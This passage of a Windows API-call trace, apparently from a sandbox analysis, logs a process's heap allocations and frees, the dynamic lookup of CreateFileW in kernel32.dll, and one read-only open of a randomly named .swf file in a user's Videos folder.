hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0106.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0106.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0106.574] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0106.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0106.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0106.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0106.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0106.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.632] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0106.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0106.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0106.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0106.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0106.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.633] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0106.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\u5ysbeddagyji-.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0106.635] FreeLibrary (hLibModule=0x772d0000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0106.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0106.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.637] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.637] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.637] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 